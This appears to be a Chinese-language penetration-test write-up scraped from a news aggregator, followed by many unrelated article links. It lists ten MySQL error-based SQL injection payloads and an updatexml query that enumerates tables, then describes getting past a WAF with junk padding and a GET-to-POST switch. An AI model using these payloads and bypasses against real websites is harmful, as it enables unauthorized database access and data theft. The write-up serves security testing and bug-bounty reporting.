對某知名品牌官方網站的一次滲透測試_ _ 頭條網

對某個企業進行滲透測試

發現有報錯注入

拓展一下10種報錯注入的方式

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

我們選擇update報錯注入

查看錶

updatexml(1,concat(0x7e,(SELECT group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)-- -

被攔截，想想怎麼繞過

後來想到加垃圾數據

加入下面生成的垃圾數據，但是414了，get傳不了這麼長的數據

生成的垃圾數據

抓包

GET改成POST

注入數據放在後面

send

獲取到表名

小貼士

對網站做滲透測試，不要拿數據，能證明有sql注入洞，並且有危害就行了，所以大家做測試的時候拿到表名就可以交補天了

相關文章:

「測試」想知道你的晚年生活，選一種狗狗告訴你！

測試：見男票父母你會畫哪個眼妝？測你在長輩眼中是什麼樣子？

測試：5月，你的貴人是誰？

測試《剪映》易用度？

開考在即！這些考試日程安排必知！

測試:選牌，分析另一半愛你有多深？

測試：你喜歡的TA是不是真心喜歡你？別再猶豫！

【 測試 】家長有五層，你現在處於哪一層？

測試：廣汽豐田iA5舒適化性徵明顯，靜音一流

測試：你最喜歡哪一株桃花？測出你的異性緣

測試你的眼力的時候到了！找到6只的，基本上你已經老年痴呆了

測試-梅賽德斯A級160：哮喘

MacBook Pro 的最大對手？XPS 15 2020 快速上手體驗 ＆ 測試

測試：你生氣時習慣性是哪種手勢？測你發脾氣時有多可怕？

加州前州長戴維斯談重開加州經濟、測試

測試！狗狗這幾種睡姿，可以看出你和狗狗之間的關係！

A股早盤多指數失靈，"419魔咒"作怪？

有五條以上，說明你還年輕

魔都“21所”雙學籍國際學校2021年的招生方案不能錯過

上課食宿“保持距離” 返校測試“找回狀態”-今日頭條-手機光明網

壺關收費站“測試+培訓”為全面恢復收費工作保駕護航

冷庫中存儲大量問題食品牟利 犯罪嫌疑人落網蕭縣_安徽網-測試

鄭州高三“二模”考試4月22日~23日進行

白水縣人民檢察院組織開展“2020年全民國家安全教育日”測試

塔羅牌 | 測試：你身上具有哪些特質？

中國隱身艦載機何時亮相 要看這位"意外轉會的外援"

【測試】五張圖片測出你的一生，敢不敢測？

測試：洗澡動作竟然能出賣你的性格！快來測測吧

廣東高速ETC明起將測試“費顯功能”-今日頭條-手機光明網

(十六) Flutter入門學習 之 測試

動態圖：驚人的火箭“跳躍”測試，柱狀體的空中懸停究竟有多難？

通過對看電影的偏好測你真實的本性如何

突發！A股早盤多個指數失靈，"419魔咒"作怪？

測試：你的下一段感情甜蜜嗎

測試：別人眼中的你是什麼人設，準到爆啊！

Euro NCAP——L2自動駕駛測試系列之二：奔馳、特斯拉、DS

測試：你認為哪個口紅顏色最好看？測你是不是天生的招桃花體質

測試：四個捧花，你覺得哪個最漂亮，測你會在什麼時候遇到對的人

測試：第一眼你喜歡哪一面團扇？測你覺得最驕傲的事情是什麼？

LOL祖安大區有牌面，又一新功能率先測試，網友直言要選“狀元”

測試：你是怎樣睡覺的，你就是什麼人？

別鬧啦，榮耀20i真實體驗出爐，哪有網上說的那麼糟！

你的腰椎好不好？3個小測試來告訴你

哪個胸花會掉落 測你容易成為紅顏禍水嗎

測試：與閨蜜逛街，你會選擇哪款閨蜜裝？測你哪方面最讓人嫉妒？

測試:始終不相信緣分盡了，我們還有成功複合的希望嗎？他想我嗎

佛羅里達海灘重新開放30分鐘被擠爆，隨機新冠測試1

#跑800是什麼反人類測試# 嗯我還記得當初我被支配的恐懼。你們當時的八百是怎麼個感受還記得不 ，其實不光八百哈，啥1500啥2400啥3000的，是吧？

奇女子，用打火機測試油是否加滿。

#榮耀Magic2耗電測試#吃完飯，半小時耗電5%

潛逃壓力過大暴瘦40多斤，一涉黑A級通緝犯在河北投案自首

當我們在談 SaaS 的時候，在談什麼？

合同詐騙的類型有哪些？企業無力償還借款是否構成合同詐騙罪？

5月西安招聘會時間安排來了！找工作的別錯過

剛剛工作的畢業生，一個月只有2000多，是不是太少了？

全球鬧「美元荒」帶動穩定幣需求暴增！以太坊交易量創近兩年新高

“幫助當地居民解決用水難題”-今日頭條-手機光明網

灌籃高手無水印壁紙，每一張都是回憶

通遼藍天救援隊成功解救遼河公園水上被困群眾

5月6日·武漢要聞及抗擊肺炎快報

肖副省長等省市領導到孝感市楚澴中學調研九年級復學暨疫情防控常態化工作

相聲界的顏值擔當張雲雷稱號大揭祕

美國百年薅羊毛攻略

《全職高手》：一口氣刷了10集，對楊洋路轉粉了

共同承擔責任！Rookie談BP問題：輸了是我們打得太臭

LOL"中韓對抗賽"遭選手反對？Zoom直言不想打，Doinb的回答太真實

李亞鵬攜李嫣出席慈善晚會，李嫣手上鑽戒搶鏡，1個動作獲誇讚！

53歲郭富城再度升級當爸，方媛懷二胎，Chant要做姐姐了

那些拼命的演員：王寶強喝了一大桶牛奶，孫儷吃10斤瓜子

賈乃亮用上了“一米陽光”這個詞，他依然渴望擁有美麗的愛情！

搞笑GIF開心一刻：我的老家農村，有妹子願意嫁給我嗎？

為什麼只有edg賺錢？

程瀟身材多好？雙腿劈叉才明白，這才是“腿精”

張柏芝承認三胎產子，否認小夥的老爸是孫東海，看來她選擇保密

T1戰隊搶注Faker商標，“囊括多個領域產品，商業潛力媲美喬丹”

雲頂之弈“最不平衡的版本”誕生，全員搶一費卡，運氣成吃雞關鍵

LPL春季賽"6宗最"：Uzi最遺憾，阿水最驚喜，V5最離譜

雷佳音被問：跟佟麗婭拍那麼多親熱戲是啥感受？他的回答笑翻眾人

JDG成最“慘”冠軍戰隊？拿到LPL冠軍人氣依舊低迷，TES成贏家！

【測試】家長有五層，你現在處於哪一層？

MacBook Pro 的最大對手？XPS 15 2020 快速上手體驗＆測試

冷庫中存儲大量問題食品牟利犯罪嫌疑人落網蕭縣_安徽網-測試

中國隱身艦載機何時亮相要看這位"意外轉會的外援"

(十六) Flutter入門學習之測試

哪個胸花會掉落測你容易成為紅顏禍水嗎

#跑800是什麼反人類測試# 嗯我還記得當初我被支配的恐懼。你們當時的八百是怎麼個感受還記得不，其實不光八百哈，啥1500啥2400啥3000的，是吧？

應急科普丨“五一” 期間氣溫回升謹防森林火災隱患